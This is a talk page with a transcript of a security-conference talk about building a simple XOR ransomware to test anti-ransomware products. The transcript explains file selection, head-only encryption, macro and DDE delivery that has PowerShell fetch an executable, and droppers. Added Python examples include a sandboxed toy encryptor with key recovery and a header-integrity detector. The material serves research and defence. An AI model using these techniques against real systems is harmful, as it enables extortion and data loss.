
I Wrote My Own Ransomware; Did Not See 1 Iota of Bitcoin

BSides Scotland · 2018 · 50:34 · Published 2018-05
About this talk
Thomas Fischer walks through building a functional ransomware variant from scratch to test anti-ransomware solutions. The talk covers the 2016 ransomware explosion, encryption methods (XOR, AES, RSA), deployment via Word documents and PowerShell, and the underground infrastructure supporting ransomware-as-a-service, including real examples of control panels and toolkits.
Original YouTube description:

Talk delivered at BSides Glasgow 2018 on the 27th of April. Abstract: 2016 saw a substantial rise in ransomware attacks and in some cases the return of favourites, with Cryptowall, CTB-Locker and TeslaCrypt being some of the most popular. The volume of attacks was in fact pretty steady for a good part of the year, with campaigns coming out on a weekly basis. It was interesting to see the variety in mechanisms used for the ransomware, which not only included self-contained binaries but went all the way to the use of scripts. As part of the research I conducted last year, I wanted to understand why there was such a drive and lure for ransomware, beyond the fact that victims will pay, as well as to have some way of properly testing "anti-ransomware" solutions with an unknown variant. So to do that, I went ahead and built my own ransomware and drew some conclusions on why it became so popular. This talk explores the background and process used to build a live ransomware that I was able to use for controlled testing, and finally draws some personal conclusions.
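The encryptor the talk walks through in the transcript below (XOR against a key embedded in the script, only the first 1024 bytes of each file, only selected extensions, system folders skipped, encrypt before rename) is simple enough to reproduce, and the speaker's remark that "you could basically decrypt the whole thing very easily" is worth demonstrating rather than stating. The Python below is an added example written for this page; it is not the speaker's PHP script. The extension list, the skipped folder names, the key and the sample files are constructed for the demo, and the key-recovery step assumes only what holds for any .docx: it is a ZIP whose first local file header is for the entry [Content_Types].xml and carries no extra field.

```python
"""Header-only XOR file 'encryption' as described in the talk, plus the known-plaintext
key recovery that makes it trivially reversible. Added example, not the speaker's PHP
script; extension list, skipped folders, key and sample files are constructed."""
import io
import os
import tempfile
import zipfile
from itertools import cycle

HEADER_LEN = 1024                                   # talk: read and XOR only the first 1024 bytes
TARGET_EXTS = {".docx", ".xlsx", ".txt", ".jpg"}    # assumed "typical business files"
SKIP_DIRS = {"Windows", "Program Files"}            # assumed system folders to leave alone


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; applying it twice with the same key is the identity."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def encrypt_header(path: str, key: bytes, header_len: int = HEADER_LEN) -> int:
    """Overwrite the first header_len bytes of a file with their XOR. Returns bytes touched."""
    with open(path, "r+b") as fh:
        head = fh.read(header_len)
        fh.seek(0)
        fh.write(xor_bytes(head, key))
    return len(head)


def walk_and_encrypt(root: str, key: bytes) -> list:
    """Recursive walk (os.walk stands in for the talk's recursive function): prune skipped
    folders, touch only target extensions, and rename only after encrypting."""
    locked = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]   # prune in place
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in TARGET_EXTS:
                continue
            full = os.path.join(dirpath, name)
            encrypt_header(full, key)
            os.rename(full, full + ".locked")
            locked.append(full + ".locked")
    return sorted(locked)


def recover_key(cipher: bytes, known: dict, key_len: int):
    """Known-plaintext attack on a repeating XOR key. `known` maps file offset -> plaintext
    bytes an analyst can predict. Returns the key, or None if some key byte is never observed."""
    slots = [None] * key_len
    for off, plain in known.items():
        for i, p in enumerate(plain):
            slots[(off + i) % key_len] = cipher[off + i] ^ p
    if any(s is None for s in slots):
        return None
    return bytes(slots)


def make_docx_like() -> bytes:
    """Constructed stand-in for a .docx: a ZIP whose first entry is [Content_Types].xml
    (assumption: no extra field in that local header, which is how zipfile writes it)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>" * 64)
        z.writestr("word/document.xml", "<w:document/>")
        # incompressible filler so the file is longer than HEADER_LEN
        z.writestr("word/media/image1.bin", bytes(range(256)) * 8,
                   compress_type=zipfile.ZIP_STORED)
    return buf.getvalue()


def demo() -> dict:
    """Encrypt a constructed tree, recover the key from the predictable ZIP local header,
    decrypt the document, and report what happened."""
    key = b"demo-key-not-secret"            # constructed 19-byte key, like one embedded in a script
    original = make_docx_like()
    with tempfile.TemporaryDirectory() as root:
        docs = os.path.join(root, "Users", "alice", "Documents")
        os.makedirs(docs)
        os.makedirs(os.path.join(root, "Windows", "System32"))
        with open(os.path.join(docs, "report.docx"), "wb") as fh:
            fh.write(original)
        with open(os.path.join(docs, "helper.dll"), "wb") as fh:
            fh.write(b"MZ" + b"\x00" * 62)
        sysfile = os.path.join(root, "Windows", "System32", "readme.txt")
        with open(sysfile, "wb") as fh:
            fh.write(b"must stay untouched")

        locked = walk_and_encrypt(root, key)
        with open(os.path.join(docs, "report.docx.locked"), "rb") as fh:
            cipher = fh.read()
        with open(sysfile, "rb") as fh:
            sys_after = fh.read()

        # Predictable without the key: ZIP signature at 0; at offset 26 the name length
        # (19, little-endian), extra length (0) and the entry name: 23 contiguous bytes.
        known = {0: b"PK\x03\x04", 26: b"\x13\x00\x00\x00[Content_Types].xml"}
        found = recover_key(cipher[:HEADER_LEN], known, len(key))
        restored = (xor_bytes(cipher[:HEADER_LEN], found) + cipher[HEADER_LEN:]) if found else None

        return {
            "locked": [os.path.relpath(p, root) for p in locked],
            "header_changed": cipher[:HEADER_LEN] != original[:HEADER_LEN],
            "tail_untouched": cipher[HEADER_LEN:] == original[HEADER_LEN:],
            "system_untouched": sys_after == b"must stay untouched",
            "recovered_key": found,
            "restored_ok": restored == original,
        }


if __name__ == "__main__":
    print(demo())
```

The recovery works because a repeating XOR key is exposed byte for byte wherever the plaintext is predictable: `C XOR P = K`. A ZIP local header hands an analyst 23 contiguous known bytes from offset 26, more than the 19-byte key, so one encrypted document gives up the whole key and every other file can be restored without the script. Encrypting only the first 1024 bytes makes this worse, not better, since the bytes that are touched are exactly the format-defined ones. This is the "second type" the talk describes, the one vendors can ship a decryptor for; the only fix is a real cipher with per-file keys, which is the back-end infrastructure the speaker says he deliberately avoided.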
Transcript

Yes, good afternoon everybody. I'm really happy to be here, actually, because it's my second year in Scotland; I did a talk last year as well. So I'm going to apologize if I put in swear words; well, it's okay. Essentially this talk came about because in 2016, and I'll get a little bit into that, there was a really significant rise in ransomware, and at the time I was working for a product vendor, and one of the things that they wanted to do was demonstrate how the solution could combat ransomware. Now I can't tell you the results of that for that particular vendor, because when I left the company there were certain disclosures or NDAs that were in place. So one disclaimer: I have never used this or released this into the public. Okay? This was not done for gain or profit at any time.

Right, so a little bit about me. I've been around in the industry for a long time; it says 25 years, actually it's more like 30 years. I'm a lot older than I look. Those are different versions of me over time; that last image on the right is essentially lately. I've been a little bit muted, or left unimpressed, by what's going on in our industry. I run BSides London; I know some of you might be coming, so it's going to be great this year again. And I'm an ISSA UK chapter board member, so we actually have a stand here this year if you want to come and find out what it's about. It's an interesting association; there's no certification process or anything like that, it's about bringing people within the industry together and doing networking.

So in 2016 there was a lot of ransomware being delivered. I mean, it was to the point where you could see a new variant of ransomware every week, and this led me to look at why we have this proliferation of ransomware. Why is this happening? Why is there such an interest in doing ransomware? And on the side I also had some, let's say, job issues, where people were like, we need a demo, we need this. So I decided to actually look at it, take it apart and see how I could build my own. But as I said earlier, I did not release this anywhere, and it was never used except in a demo environment. Plus, everything you'll see, you could basically decrypt the whole thing very easily, so it's not that big. So 2016, the year of ransomware: there was such proliferation, and we saw different versions of ransomware. This is before WannaCry. Okay? WannaCry was actually,

for me I think, a wake-up call for our industry, for people, for the world, and there's been less activity compared to 2016 since WannaCry, and I think it's because people got a sense of what was going on. Plus you have the issue with MalwareTech being arrested in the US. There's still ransomware out there; it's just died down in terms of the volume, because our attitude has changed. It even got to a point where, towards the end of the year, ransomware as a service was being sold on the dark web, so you could actually buy ransomware as a service and you could release it on your target victim; the ransomware service would take a cut and you would get the rest. I mean, this is really going into a full industrial process, and we'll talk about that a little bit afterwards.

So one of the things that led me to do this research as well is that, basically, if you've ever worked for a product company, you have the marketing guys who are like, we need to show that our product does this, we can show them what we can do, and then the sales guys going, yeah, we want to demo this, but we can't demo it in a demo environment. Sometimes we don't have internet, sometimes we don't have this; we need to be able to do something locally in a VM, we need to be able to do something in a controlled manner, but to demonstrate the value, going beyond the video-type value. So what can I do? Well, the easy answer was build something that you could demo and give them a solution, so that's how this whole thing came about.

So let's go back to 2016. I said 2016 saw an enormous growth; this source is Proofpoint, who were tracking the growth of ransomware, and if you look at the year, it started low and by the end of September we were talking about a 752 percent increase. Okay? A 752 percent increase; that's a massive increase of variants and ransomware being released in the wild. One interesting thing in that study was that at the beginning of the year it was mostly malicious documents, and towards the end of the year malicious Office documents came about; there was very little URL, and the explanation for that is that if you look at some of the technologies that we're putting into place, filtering on emails, we can easily filter out bad URLs in

emails and capture them as they're going out of the company through the perimeter solutions; however, the attachment is a little bit more complicated. So malicious Office documents were some of the primary mechanisms by which they deliver ransomware, but in 2016 we saw something new, which was a zip file with a JavaScript attachment, and if you look at the black line in this chart you see that over the year it just grew and grew, because the malicious parties realized that, number one, it was getting through the traditional protection mechanisms, and number two, users were actually clicking on it.

So I actually run a honeypot. I don't know if you guys know Xavier Mertens; he's a SANS incident response person as well, so he runs a honeypot as well. So we talked, I think it was last year or the year before at BSides, and we were talking about how we were tracking all these emails and ransomware, and we saw basically a frequency. So if you look at this chart over the year, you see the spikes: the month starts very slowly, and then it increases over the month. Basically, think production release schedules. If you've done production IT, what happens is usually when you're rolling out a new application, you might start with the application and say, okay, at the beginning of the month you roll it out to a few people, then towards the end of the month you've fixed all the bugs, you've created a more stable version, so you roll it out to more people. And this is what we were seeing in the frequency of emails that were going through. If you deep dive into a month, you actually see that it's even more production-type focused, where at the beginning of the week you get the bulk of emails and then towards the end you trail off and you get less frequency. So there was a rhythm, in the sense that if you think about release schedules, you release at the beginning of the week, and if something goes wrong you have the week to fix it. In this case, basically, they were releasing at the beginning of the week and optimizing the delivery mechanism over the week and over the month. We saw that there was a majority, in late 2016, of zip files,

so the attachments would primarily be zip files. If you look at the light blue at the top of the pie chart, that's Office Word files; the purple is Excel. So there's very little of these, and these are the ones I'm talking about: very little of these Word documents were actually coming in, because Microsoft actually thought about what was going on, so they started to deactivate macros, they started to actually protect the Office infrastructure, the Office applications themselves, so it was getting harder and harder to actually deliver ransomware via documents, so they switched to the zip mechanism. The advantage of doing the zip mechanism is they could, if needed, password-protect the zip file. If you password-protect a zip file, it just goes through any kind of email solution, because it doesn't know how to read the zip file, and the zip files were just carrying a JavaScript or a Visual Basic script, and those were going through because most solutions don't actually take those scripts and analyze them, or aren't capable of analyzing them, and you don't really have a signature to actually match this.

So what is ransomware? Let's dig a little bit into ransomware. So this is a chart from F-Secure; they have over time highlighted the different variants of ransomware, and if you look at 2016, 2016 starts here, and you look at the number of different variants that were actually released over the months, it's immense compared to the previous years. There was just an explosion of variants, and some of them were very minor modifications; some of them went from a JavaScript to an executable, for example. So it's extremely prolific, and there's a lot of action going on in 2016. Essentially you'll find that these types of ransomware come in probably four different variations.

So the first one, and the easiest one to actually do, is you have a command-line based solution. So there's a lot of ransomware in 2016 that started off essentially as either a Python script, a PHP script, and even PowerShell towards the end of the year. There was one, in the grey box, where all the ransomware did was download 7-Zip and just 7-Zip password-protect the files, and that was just a batch file, a Microsoft Windows batch file. And the reason they're doing this is because it's easy; it's really easy to get in and it's really easy to actually bypass security applications, because the command line basically says

we're in this world. So if you look at basically what it does, it deploys 7-Zip with a different name, so a dot-zero-dot-exe, and then does the 7-Zip command. The thing with 7-Zip is most endpoint protection systems will just flag it as okay, because it's a valid executable, it's a valid tool, and this is one of the problems that we're still seeing today: because some of these malicious parties can actually use these tools against us, there's no protection, because you're not going to disable PowerShell, you can't really disable PowerShell now; the only thing you can do is monitor and control.

So the second type of ransomware threat we see is essentially just using either an executable or a script and applying a shift or a hashing technique. So these don't work very well, because it's quite easy to reverse. So when you hear that F-Secure or Kaspersky released a decryption tool, it's usually because it's one of these first two types of ransomware, because the password's embedded in the script or the hash is really easy to decode, so they can backtrack the hash. After that you basically get into the more complex stuff, so you get into a binary that's using a real encryption technology, a real encryption system: AES, GOST, DES and Triple DES, ROT13 or XOR. So these essentially use a single secret key, apply the encryption to the file, and that key is also stored somewhere, and they decrypt it. So the thing with the first two is it's actually quite easy to deploy; you can embed the key inside the executable or the script. On the third one you have two options: you can embed the key, but then it's easy to find, or you have to basically generate a key and store it somewhere, so you need an infrastructure in the back end, and that's where you get into your command and control servers to actually manage these keys. So you need a key management system.

The fourth type is a lot more complex and rarely seen; those use RSA-type encryption, and the problem with that is you need a public key and a private key. So essentially what happens is the ransomware connects to the back-end control system, requests the key, the back-end key management system generates a private key, locks it securely in its infrastructure and gives the ransomware the public key, and the public key is used to encrypt the endpoint, typically. So if you get hit by the third type of variant, the third

variant on this list, you'll see that your ransom note is always the same, so it says you've got ransomware, pay Bitcoin, this is your ID, give us your ID. The ID will always be the same because the encryption key is always the same. If you have the fourth one, you'll get a different encryption notice and ransom note for each endpoint that gets affected, because every time it hits an endpoint it generates a new key. That's how the mechanism works.

So what are the stages of an attack? The stages of an attack are actually quite simple. So first there's the delivery mechanism, so that's typically an email phishing campaign. Then there's the execution, so that's when the user opens it and it executes a binary or a script. It then goes into the encryption phase, so the encryption phase is essentially when it happens: that's when the file gets encrypted and you lose access to your files. Very important here is that in the encryption phase, the good and proper ransomwares will encrypt first and rename second. So if you have a solution, and I'll talk about this a little bit afterwards, if your solution is looking at renaming of files, you're basically too late in most cases, because the file's already encrypted inside. You then have, depending on the type of ransomware, a spread phase. So WannaCry basically would infect the endpoint, encrypt, and then it would spread; it would look for other endpoints to target. The spread phase is actually optional, essentially, because it depends on the malicious actor and the infrastructure they have in the background. And typically in parallel, I mean I put it afterwards but in parallel to the spread, you also display the ransom note. There's also some activity in that encrypt phase, or at the end of the encrypt phase, which is the persistence, so you add persistence mechanisms onto the endpoint so that if the user reboots the ransom note gets displayed and you carry on like that.

So I'm going a little bit fast because I'm time conscious. So let's get our hands dirty. So that was the background; how do you actually build one of these things? Well, it's a piece of software, so you think, okay, I'm going to go through the software development lifecycle. It's like, no, a malicious party's not going to do that; the malicious actors are not going to go through a whole back-end process like this. That said, some of the organized actors in the dark web actually do have a full software

development cycle for some of their C&C stuff. They actually have a plan, they have QA, they have help desks and things like that. But that wasn't the goal; the goal is I wanted to see the attractiveness and the simplicity of actually deploying this. So I switched more to a mind-map type model, thinking about software development: what stages do I need, what do I need in my software? So this is the mind map of what I needed. So basically I decided, okay, I have my ransomware that I want to build, so I need a delivery mechanism first, so I have to think about how I'm going to deliver it. So email or web drive-by, those are the two most common, and that's what you usually see. I decided to go for email. So you either do a JavaScript in a zip or you do a Word attachment; this could be other things apart from JavaScript, but the most common, as you know from the stats, was JavaScript or the Word attachment. Because this was a demo and it had to be simple, I just left it as a Word attachment.

Then you get to the encryption phase, so this is where it becomes more interesting, because in the encryption phase you're actually going to build the software, so you need to have a programming environment. So there are different options: you can do PHP, you can do PowerShell, you can go all the way to C#, Python, C, C++ depending on your preferences, but if you choose some of the more advanced programming languages it intensifies the complexity of your ransomware, so you're not going to get a quick and easy dirty solution. You then need your actual code. So the actual code is pretty simple: you set the key, you parse the disk, and for each file you're going to look for files of type docx, txt, xls, jpeg, typical business files. You're not going to encrypt everything; there's a reason for that and I'll explain it a little bit later. You also are not going to look through every folder; essentially, if you do look through every folder you might hit system folders and create a blue screen, which is counterproductive. And then you have your run phase, so basically in your run phase you're going to launch the script, you're going to launch the encryptor, and you're going to set your persistence and show the message.

Now there is also a phase that is part of the process, which is to deploy a dropper. So how many of you guys know what a dropper is? So this varies; I've seen this varies. So if the

malicious party wants to gain control and do lateral movement and do more than just ransomware, you're going to need to deploy a dropper. It deploys essentially your RAT or whatever; I'll talk about it like that. The issue with that, remember this is for a demo environment, so I wanted simplicity: if you do a dropper you need a server, you need obfuscation techniques because those are actually detected by antivirus programs, and you need a payload system. So you need to be able to build all that, and I'll talk a little bit about that later, but it's something to consider when you're doing this.

So then we go to the encryptor. So you need to understand encryption, essentially. So if we go back in time, the first type of encryption, sorry I'm going too fast right now, the first type of encryption: does anybody know what this is? Say it a bit louder. So this is a Caesar cipher. So a Caesar cipher was, for those who don't know, basically Caesar during his campaigns with his generals wanted to share information privately, so they came up with a simple system, which we now call ROT13, which is the second one here, where you basically use some kind of tool which allows you to realign the letters. So in the Caesar cipher they had a wheel which they would turn depending on the day, depending on the code that was in use, and that would allow them to encrypt the words and then decrypt them on the other side. Interestingly enough, a friend of mine in the US used to work for the NSA a long time ago, and he actually did something like this for the CIA, and this is one of the first encryption systems the CIA used during the Cold War, a variation of it. So yeah, then, like I said, you have ROT13, which is a very simple encryption system based on the Caesar cipher. Then you go up to XORing, so using an XOR principle where you basically have an upstream data packet, you apply an encryption key and then you have your encrypted information. The advantage of an XOR is that it's reversible very easily. You then go into something more complicated, which is AES, so if you know, that's block cipher technology. So you basically have an initialization vector, you have your original data, you apply the ciphertext and you keep applying it: you apply the block, you take the block, reapply, so it takes a certain period of time. And then at the top right you have the RSA-type encryption, where you have some kind of key to which you apply a mathematical modular aspect. So I was looking at these

encryption methods and I was like, well, AES I could do; it's very simple, there's plenty of libraries, it's public. The problem is it's still quite complicated and you need a lot of libraries, and I'll get into why you need a lot of libraries afterwards. I didn't want this to be too complicated, so at the end I just said, okay, let's just use XOR. XOR is really simple: it's exclusive disjunction, so basically when you apply your key, if you apply an XOR to a value with zero it equals zero, and if you XOR the value with itself it's zero as well. If you start applying a key, essentially you get this mathematical logic which basically says that, as long as the key stays the same, you can reverse it quite easily, and it's equal to itself. So that was the principle, that's the key, that's the system. But I chose it because it's easy to implement; there's plenty of single one-line codes which actually do this, it's really simple, so the simplicity is a really good thing in this type of environment.

So what do you need? Well, we've decided on the encryption, so I need a place to develop this. Why do you need a place to develop this? Well, think about it: you are going to do some code, you're going to want to test that code. So it's natural for a developer: he writes his code, compiles it, runs it, whatever, and applies it. The problem is, if you accidentally hit something at the same time, this happens: you encrypt your environment. So interestingly enough, the first script I wrote to actually do this, I messed up the encryption algorithm, well, the encryption code, and the reverse didn't work, so I basically encrypted my environment. Luckily I did it in VMware, and I was like, okay, an hour's worth of work down the drain; revert to my snapshot and restart. So that's why using VMware and snapshot technology, not necessarily VMware but using a virtual environment where we have snapshot technology, and snapshotting often and frequently, is really useful in this type of situation, because it's really easy to make a mistake. So the principle that I decided on was to use a scripting technology with an interpreter, and download that interpreter, well, apply that interpreter via a Word document. And the reason I got into this situation is I was doing some testing; I rebuilt the Word document and then I accidentally hit enter on the keyboard, because I was distracted and the focus was on the Word document in Explorer;

the document opened, and that was the end of the day. Okay, so you've got to be careful what you're doing; it's always good to have VMware in place, and you need to think about things like that. So choose your tools wisely, VMware being one of them. There's another aspect to choosing the tools wisely, because depending on the type of tool, you're going to have more or less functionality and ability to actually deploy. If you're compiling a binary from scratch, it's really easy; the problem is you need a full development infrastructure, so you need something like this: you need Visual Studio or Eclipse. So how many of you have used Visual Studio or Eclipse? It's a [ __ ] resource hog, especially Eclipse; I can't even open Eclipse anymore because it just annoys the crap out of me, and I didn't want that. I wanted something simple; I just needed to do this really quickly, because I was one week away from a sales kickoff where I needed to give this to the sales guys and the pre-sales guys. And it needs to be easy to deploy.

I originally tested this with PowerShell, and funnily enough this was before somebody actually launched the PowerShell scripting encryption. The problem I found was, if you were hitting Windows 10 it worked really well, because Windows 10 has a full PowerShell stack inside; if you were hitting a Windows 7 box it doesn't work, mostly because PowerShell really isn't enabled by default on Windows 7. There's a version 1.0 of PowerShell on Windows 7, but version 1.0 is very simplistic and it was really hard to actually get it to do proper encryption. You could do it, but it was just really hard, and if you wanted to do it properly in some cases you actually needed to force the installation of Windows PowerShell, so that was just an extra step I wasn't willing to go through. So then you have PHP. I ended up choosing PHP, and I'll get into that a little bit later. And you have your Word documents or zip. The other good thing too is, because I was working in a VM environment, I used Notepad++; it's free, plus it does code highlighting, and I'm a lazy bugger, so I like to have my code highlighted to make sure I'm using the right commands. So that's choosing a tool.

Code breakdown: so then I sat down, I used to do UML in my past life, so I said, okay, I'm going to try and give some structure to this and make sure that I know what I'm doing. So I broke it down;

it's a simple UML structure. So I kick off the program, I set the key, I set the starting path. That's important: most ransomwares will just look for every disk on the endpoint and encrypt, and even go to shares. I didn't need that; I just needed to demonstrate simple ransomware, somebody taking over somebody's endpoint, so I need to set a starting path. So if you look at the structure of a file system, the way it's described to the user is essentially you have a set of folders within folders and files within those folders; that is a tree. So if you've done programming in your development life, what's the easiest way to parse a tree? Recursion. You do a recursive function; you just keep calling the function every time. So what we do here is basically we look for a folder; if we have a folder, we find the files inside, we check that the files are a certain type, we encrypt, we rename the file, we look if there's more files; if it's a directory, we call ourselves. Because of the space, I didn't put the recursion in this. So this is what the code looks like. It's very simple.

So as I said, I chose PHP for a reason, I'll talk about it a bit, but essentially I set the code with a secret. So the secret, I encode it in base64 just for the fun of it, just to hide it in the script, so a simple user, if he finds the script and opens it, can't see the key, except I'm a little bit lazy so I didn't take out the comment, so the key's up there. So you can have varying lengths of keys; of course it doesn't really matter, because it's your XOR function, it'll take care of the actual positioning. You then start to parse your disk. Now we avoid these directories on Windows, and there's some later on, Mac ones as well. Does anybody know why I want to avoid those directories? Anybody? I think I've mentioned it a little bit earlier, but why would I avoid the system directories? Yeah, exactly, somebody said it in front. You don't want, if you do hit those directories and you encrypt something in those directories, there's a good chance you'll blue screen the host. You'll kill the host; if you do that you'll stop encrypting and basically reboot, and you haven't got to doing your persistence, so you want to avoid that. Plus, if you do encrypt this stuff, you might be encrypting things like Notepad or the preview application, and

if you do that you can't show your ransomware note. You need to be able to show your ransomware note, so you need to leave some functionality on the endpoint. Now it's true that you have some ransomware that will encrypt the BIOS, but that's a different model; we're just looking at file encryption here. So then, if you have a file, you're going to look for all the files with certain extensions, because again you don't want to encrypt DLLs; it might be useful, but you want to encrypt the data, what's important to the user or to the organization. So you want to look for Office documents or subsets of Office documents, like text files, zip files, RAW files, Excel, Word, anything that you can think of; you can build a list. I kept it simple; I look for the typical Office documents. Then you open the file, you open the file in write mode, and then you apply your XOR. So this is the simple XOR functionality. The good thing with PHP is, if you read a file into a buffer, you basically have that buffer and you can address it as an array, so for the XOR you run your loop over the array, you apply your ordinal functions here, you apply your encryption here with the XOR, then you rewrite the block.

Now, some of you guys know PHP, you know what this function does: basically open the file and read 1024 bytes. So why am I only reading 1024 bytes? Can anybody guess? Speed, yeah. And the thing is, you don't need to read and encrypt the whole file; as long as you encrypt the head of the file, the file becomes useless. Most of the information on file systems regarding the file is at the front, at the header of the file: the description of the structure of the file, the type of file that it is; you have your magic number in the head of the file. So if you read the file from zero and read, say, 1024, 2048, 4096 bytes, you have a smaller buffer to work with, that means your application doesn't need that much memory to run, and you basically encrypt the information that is going to kill the file anyway. So that's basically it, very simple; what is this, like 20 lines of code? And it's roughly the same thing if you try to do an executable.

Now, why did I settle for PHP? There are some gotchas when you're using an interpreted language. The first time I did it, I just

downloaded the stock PHP, PHP 5, ran it, and it complained because it still needed a bunch of DLLs, right? So when you're doing this type of stuff, and when they're doing this type of stuff, they're going back in time; they know what they're doing; they're going back to the simplest version of the interpreter that you can use. So you have to go back to the right version of the interpreter: if you go back far enough you don't need DLLs, for example. The other thing too with something like PHP or Python is that you can actually recompile your own interpreter and include everything inside the executable. So why do you need to do it? Because essentially, once you have this,

right, so you've got your PHP, you've got your script, you have to put it in your Word document or you have to make it downloadable from somewhere. So to ease that, you want to have the smallest amount of information to put into your Word document or to download from a website, right? So you want something simple and contained. If you have to deploy multiple files and multiple DLLs at the same time, number one, it gets bigger, it gets more complex; plus you'll start to hit detections, right, because you're installing a lot of files into the system. The less you have to install, the less likely you are to get caught, the more chance you have of avoiding

detection. Plus, by using the stock PHP you basically get a green light from most of the antivirus vendors, right? If you upload that into VT it comes out green, because it's PHP.
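The point made above, that overwriting only the first 1024 bytes destroys a file because the magic number and structure description live at the head, cuts both ways: a defender can sweep a share and flag documents whose leading bytes no longer match the magic number their extension implies. The following is an added example written for this page, not the speaker's code; the extension-to-magic allowlist, the 1024-byte window and the sample files are all constructed for the illustration.

```python
"""Header-integrity sweep (added example): flag files whose first bytes no
longer carry the magic number their extension implies. Only the head is
read, the same window a head-only encryptor destroys."""
import io
import math
import os
import tempfile
import zipfile

# Expected leading bytes per extension. Constructed allowlist for this
# example; extend it for the formats your environment cares about.
MAGIC = {
    ".docx": b"PK\x03\x04",
    ".xlsx": b"PK\x03\x04",
    ".zip": b"PK\x03\x04",
    ".pdf": b"%PDF-",
    ".png": b"\x89PNG\r\n\x1a\n",
}
HEAD = 1024  # bytes inspected; matches the 1024-byte window discussed in the talk


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of `data`; 8.0 means a uniformly random-looking buffer."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def inspect_file(path: str) -> dict:
    """Return a verdict for one file. 'suspect' is driven by the magic check
    only: a single-byte XOR is a bijection on byte values, so it preserves the
    byte histogram and therefore the entropy of the plaintext head. Entropy
    is reported as context, not used as the trigger."""
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        head = fh.read(HEAD)
    expected = MAGIC.get(ext)
    magic_ok = expected is None or head.startswith(expected)
    return {
        "name": os.path.basename(path),
        "known_type": expected is not None,
        "magic_ok": magic_ok,
        "entropy": round(shannon_entropy(head), 2),
        "suspect": expected is not None and not magic_ok,
    }


def sweep(directory: str) -> list:
    """Inspect every regular file in `directory`, sorted by name."""
    results = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if os.path.isfile(path):
            results.append(inspect_file(path))
    return results


def build_sample_dir() -> str:
    """Constructed sample data: two intact documents and one whose head has
    been overwritten with non-document bytes."""
    d = tempfile.mkdtemp(prefix="header-sweep-")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:  # minimal but valid .docx container
        z.writestr("word/document.xml", "<w:document/>")
    with open(os.path.join(d, "good.docx"), "wb") as fh:
        fh.write(buf.getvalue())
    with open(os.path.join(d, "good.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n%constructed sample\n" + b"x" * 2048)
    with open(os.path.join(d, "damaged.docx"), "wb") as fh:
        fh.write(bytes(range(256)) * 8)  # 2048 bytes, no PK header
    return d


if __name__ == "__main__":
    for r in sweep(build_sample_dir()):
        print(r)
```

The sweep is deliberately cheap (one small read per file) so it can run across a file server on a schedule; a sudden jump in the number of `suspect` results is the signal worth alerting on, and the entropy column helps triage but, as the comment notes, will not move at all for a simple XOR with a repeated key.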

So if you go back and do something simple, you go back in time, you basically have everything okay. All right, so your script runs, there are no errors, and you get an encrypted platform, right? So it's simplicity again; there's a theme to this and that's simplicity. I want to keep it simple, but I think the malicious party is also looking at simplicity. So now you have your script, you have your executable, you need to wrap it up in a batch file and deliver it. The easiest thing I found to do was basically package this into a VBA Word, a Visual Basic, or an Excel DDE file. All right, now you can do this manually if you know

what you're doing in macros; however, it's quite easy to find tools like fro Docs readily available that will allow you to actually inject the macros, and it's really cool because you inject the macros in a hidden way, right? So you've got all the function names and everything like that obfuscated. The one that I really liked was using DDE. So I did one with Excel using DDE. Does everyone know what DDE is? It's the Data, Data-something Exchange. It essentially allows Excel to go query databases, but you can actually get it to run CMD, right? So you're not using macros anymore; as soon as you open the file it refreshes and

does the DDE commands. So basically what it does is it launches CMD, runs PowerShell, PowerShell downloads my executable and then runs it. That's simple enough for PowerShell to do, and it runs on every version of PowerShell. You can also do it with a simple batch script if you need to. All right, the advantage of doing that is you don't use VB, so if VB is turned off in the environment that you're attacking, it bypasses that restriction. So then there are two options, you know: you can either base64 the executable and put it into your Word document, but that makes the script a bit more complex, and I didn't; like I said, I'm a lazy bugger,

so I didn't want to actually make this complex. At the time I was building this AWS environment, so I said, oh well, I can just pay for an instance, real cheap, free for a year, spin it up, put a simple web server on it, put my executable on the web server and point my script to that executable. All right, simple enough. So you get where I'm going with this, right? It's really simple to implement and deploy if you think about it. So is that enough? Well, as I said earlier in my mind map, there is some ransomware that uses droppers. So right now I have a functional ransomware:

I tested it, I can deploy it. I just put it in an email, a fake email that I put on the demo system; the user opens it, or the pre-sales guy opens it, and then there was the ransomware. So, what we started to see over the year, well, let me rephrase that. One of the reasons that I started down this track is because some of the things I was seeing from my honeypot were that campaigns would start with simple scripts like that, right? They would use simple scripting technology like that, and over time the variants would increase in complexity and they'd start adding RATs and droppers, all right, so they could do

more things. So at this point I was like, okay, I have one, I've still got a few weeks to go before the kickoff, before I have to demo this, so I said okay, I'll do a little bit more exploration. So loaders or droppers, those are the most common; you'll find variants of them: Zeus, Dridex, Citadel, [inaudible], all of those. The only problem is: anybody speak Russian? So, since it's in Russian, hopefully this says what my Russian friend gave me: you need an introduction and to speak Russian. Is that roughly the translation? Thank you. So that is the problem, right? Most of this stuff is run by Russian organizations on the dark

web, and to get the latest and greatest version that isn't detectable, you need to have an introduction into this environment; you need to know people who will introduce you and vouch for you. You can find examples of them from the ones that have been detected and basically brought down. So luckily I have a friend, and he gave me a copy of Gaudox. This happens to be the control panel. It's like, what, a C&C has a control panel? Yes, a full-blown control panel with stats and everything. It tells me how many hits I've had, how long they've been open for the past days, the locations; I have a map of where they've

got, where they are. And then you have a full client ID; you even get screenshots of the client, all right, so you can see what the guy's working on. At this point you can script other things like that. So I say, okay, this is simple enough. Again, all I needed was a website, and I already had one because I was publishing my executable on the website for it to be downloaded, so I just added Gaudox into it. So there's a tool set to help you build your Gaudox engine. This is really cool in there. The thing is, it's like one of the reasons we

